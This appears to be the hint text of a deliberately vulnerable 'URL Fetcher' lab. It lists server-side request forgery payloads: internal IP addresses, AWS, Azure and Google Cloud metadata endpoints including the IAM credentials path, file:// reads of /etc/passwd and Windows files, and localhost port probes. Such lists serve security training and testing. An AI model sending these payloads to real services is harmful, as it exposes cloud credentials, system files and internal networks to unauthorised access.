URL Fetcher (SSRF Vulnerable)
Internal Network Scanning:
• http://localhost
• http://127.0.0.1
• http://192.168.1.1
• http://10.0.0.1
• http://172.16.0.1
Cloud Metadata (AWS):
• http://169.254.169.254/latest/meta-data/
• http://169.254.169.254/latest/meta-data/iam/security-credentials/
• http://169.254.169.254/latest/user-data/
Cloud Metadata (Azure):
• http://169.254.169.254/metadata/instance?api-version=2021-02-01
Cloud Metadata (Google Cloud):
• http://metadata.google.internal/computeMetadata/v1/
File Protocol:
• file:///etc/passwd
• file:///c:/windows/win.ini
• file:///c:/windows/system32/drivers/etc/hosts
Port Scanning:
• http://localhost:22
• http://localhost:3306
• http://localhost:6379
• http://localhost:27017